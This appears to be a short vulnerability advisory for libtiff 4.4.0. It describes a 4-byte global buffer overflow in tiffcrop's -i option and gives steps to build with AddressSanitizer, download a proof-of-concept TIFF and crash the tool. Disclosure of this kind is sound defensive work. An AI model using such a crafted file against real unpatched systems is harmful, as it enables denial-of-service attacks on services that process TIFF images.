A global-memory buffer overflow in the libtiff library leads to denial of service when processing crafted TIFF images with tiffcrop.
libtiff (,), no fixed release
A 4-byte global-memory buffer overflow occurs when tiffcrop
is run with the -i
argument against a crafted TIFF file, leading to a crash of tiffcrop
.
Compile libtiff 4.4.0 with ASAN
curl https://gitlab.com/libtiff/libtiff/-/archive/v4.4.0/libtiff-v4.4.0.tar.gz -o libtiff-v4.4.0.tar.gz
tar -xf libtiff-v4.4.0.tar.gz
cd libtiff-v4.4.0
CC=gcc CXX=g++ CFLAGS="-ggdb -fsanitize=address" ./configure && make
Run the PoC
cd tools
curl https://gitlab.com/libtiff/libtiff/uploads/9943030806e03e7d2b8dff5ec0341b6f/poc.zip -o poc.zip
unzip poc.zip
./tiffcrop -i poc.tif a.tif
No vulnerability mitigations are supplied for this issue